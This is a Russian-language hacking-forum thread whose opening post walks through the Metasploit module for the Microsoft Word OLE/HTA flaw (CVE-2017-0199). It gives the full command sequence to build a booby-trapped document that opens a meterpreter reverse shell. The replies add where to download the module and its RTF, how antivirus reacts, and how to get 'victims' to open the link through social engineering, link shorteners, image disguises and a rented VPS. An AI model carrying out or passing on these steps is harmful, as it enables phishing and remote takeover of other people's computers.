Доступ к удаленному хосту (Microsoft Word)

Vander

CodebyTeam
Gold Team
16.01.2016
1 420
4 316
Привет всем! В этой статье я хочу показать, как можно получить активную сессию meterpreter, на удаленном хосте (Windows 8.1., Windows 7, Windows Server 2008) используя скрипт python который генерирует .rtf-файл для атаки. Все необходимое включено в Metasploit Framework.

upload_2017-5-11_22-36-49.png


Этот модуль создает вредоносный файл RTF, который при открытии в уязвимых версиях Microsoft Word приведет к выполнению кода. Уязвимость состоит в том, когда объект OLE может сделать запрос http(s) и выполнить hta-код в ответ.

OLE— технология связывания и внедрения объектов в другие документы и объекты, разработанная корпорацией Майкрософт.

OLE позволяет передавать часть работы от одной программы редактирования к другой и возвращать результаты назад. Установленная на персональном компьютере издательская система может послать текст на обработку в текстовый редактор, либо изображение в редактор изображений с помощью OLE-технологии.

Основное преимущество OLE —она позволяет создать главный файл, картотеку функций, к которой обращается программа. Этот файл может оперировать данными из исходной программы, которые после обработки возвращаются в исходный документ.

Эта ошибка была изначально замечена в октябре 2016 года. Модуль был создан путем обращения вспять общедоступного образца вредоносной программы.

Начнем:

> use exploit/windows/fileformat/office_word_hta

> set srvhost 192.168.0.106

> set payload windows/meterpreter/reverse_tcp

> set filename order.doc

> set lhost 192.168.0.106

> exploit

upload_2017-5-11_22-37-37.png


Выделенная ссылка, на скриншоте ниже должна быть доставлена целевой хост:

upload_2017-5-11_22-37-58.png


Переход по ней и открытие скачанного файла, откроет активную сессию meterpreter:

upload_2017-5-11_22-38-16.png


> sysinfo

upload_2017-5-11_22-38-31.png


На этом все, спасибо за внимание.
 
C

CVlad

какие версии офиса подвержены данной уязвимости?
 

Vertigo

Lex mea est Vulgate Linux
Gold Team
15.02.2017
1 318
3 996
какие версии офиса подвержены данной уязвимости?
Уязвимость выстрелила как зеро-дэй. Речь шла о всех версиях. Так прошёл год )) Ждали от Майкрософта обновления с патчами.
11.04.2017 они действительно вышли и большей частью для МО 2016,2013,2010 г.
Но всё равно подозрительная тишина в отношении успеха.
Возможно ,пока к исчерпывающим ответам не готовы компании на рынке ИБ.
Кроме того, этого же числа , поддержка Win Vista должна быть прекращена по планам.
И это для поддерживаемых ОС,либо озадаченых обновлением пакета безопасности для МО.
 
  • Нравится
Реакции: id2746 и Vander
O

Oksy

Пожалуйста поподробнее объясните, что сделать с данной ссылкой. Как запустить meterpreter, как использовать. Не кидайте тапками, только начинаю знакомство с эксплойтами и метасплойтом
 
  • Нравится
Реакции: CVlad, Mikhail84 и Vander

Xulinam

Grey Team
02.03.2017
1 015
239
Пожалуйста поподробнее объясните, что сделать с данной ссылкой. Как запустить meterpreter, как использовать. Не кидайте тапками, только начинаю знакомство с эксплойтами и метасплойтом
да никто не кидает тапки)) ссылку доставь в контакте или еще как нить и убеди, что емц необходимо посмотреть этот документ)) короче изучай соц инженерию )
 

Vertigo

Lex mea est Vulgate Linux
Gold Team
15.02.2017
1 318
3 996
Пожалуйста поподробнее объясните, что сделать с данной ссылкой. Как запустить meterpreter, как использовать.
Вам надо воспользоваться поиском по форуму,задать теги meterpreter , metasploit .
Очень много отличных статей вышло от наших известных авторов.Быстро изучить не получится,т.к инструмент
огромен по функционалу. Ссылка, как вариант , прилагается к письму и отсылается с рассчётом на прочтение.
 
  • Нравится
Реакции: Vander и Xulinam

ghostphisher

местный
Gold Team
07.12.2016
2 605
3 428
К сожалению в Parrot OS не попал, на момент написания поста, данный эксплоит в MSF. Но его можно качнуть и добавить руками в папу /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

качнуть код - под хайд

https://packetstormsecurity.com/files/142281/office_word_hta.rb.txt

Но это не все, что бы не получить ошибку:
Exploit failed: Errno::ENOENT No such file or directory @ rb_sysopen - /usr/share/metasploit-framework/data/exploits/cve-2017-0199.rtf

качаем:
wget https://raw.githubusercontent.com/n...CVE-2017-0199/data/exploits/cve-2017-0199.rtf

стартуем, пробуем =)

ТС - респект за оперативный топик =)
 
Последнее редактирование:

Xulinam

Grey Team
02.03.2017
1 015
239
К сожалению в Parrot OS не попал, на момент написания поста, данный эксплоит в MSF. Но его можно качнуть и добавить руками в папу /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

качнуть код - под хайд

***Скрытый текст***

ТС - респект за оперативный топик =)
Cпс ты как всегда спасаешь Parrot OS
 
  • Нравится
Реакции: ghostphisher и Vertigo

Xulinam

Grey Team
02.03.2017
1 015
239
отлично прошлось по виндовс 10 при работающем авасте )) но при скачивании гугл Хром ругаеться, что фаил может быть плохой и навредит компу))
[doublepost=1494623166,1494620336][/doublepost]добавлю ) после открытия файла на вин10 ) на панели висит непонятный значек, который напрягает и привлекает внимание)
 

Вложения

  • Screenshot at 2017-05-12 23-16-11.png
    Screenshot at 2017-05-12 23-16-11.png
    227,9 КБ · Просмотры: 219
  • Нравится
Реакции: Vander
I

Inject0r

каспер блочит ссылку. При каспер работает на железе, а блочит на виртуалке))
 
H

hdmoor

в 10-ке открытие этого файла не даёт сессии метерпретер (нет коннекта ни с бриджем ни с натом...фаервол отключен)...в чём дело?...уже что ли закрыли?
 
Последнее редактирование модератором:
J

jaguar

Failed to load module: exploit/windows/fileformat/office_word_hta
msf > и как загрузить модуль?
 
J

jaguar

metasploit v4.12.22-dev
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post
+ -- --=[ 455 payloads - 39 encoders - 8 nops
+ -- --=[ Free Metasploit Pro trial:
 
Последнее редактирование модератором:
J

jaguar

http://192.168.0.14:8080/default.hta и как такую ссылку вручить? ни один пользователь не перейдет. Ссылка придает вид опасности. Возможно её скрыть под картинку?
 
Z

Z3T

http://192.168.0.14:8080/default.hta и как такую ссылку вручить? ни один пользователь не перейдет. Ссылка придает вид опасности. Возможно её скрыть под картинку?
Через сервисы коротких ссылок или в картинку, так же можно ее в документ вставить типа ссылка
 
J

jaguar

Код:
http://192.168.0.14:8080/default.hta
сократил ссылку онлайн когда жертва скачивает запускается файл hta и сессия не открываеться почему? Может нужно открыть порты?
 
Последнее редактирование модератором:
Z

Z3T

Код:
http://192.168.0.14:8080/default.hta
сократил ссылку онлайн когда жертва скачивает запускается файл hta и сессия не открываеться почему? Может нужно открыть порты?
Тестируешь где? На виртуалке? Порты естественно нужно открыть и лучше взять для этого vps с прямым ip и на него запилить, так же все это палится антивирусами, может и он захавал
 
Мы в соцсетях: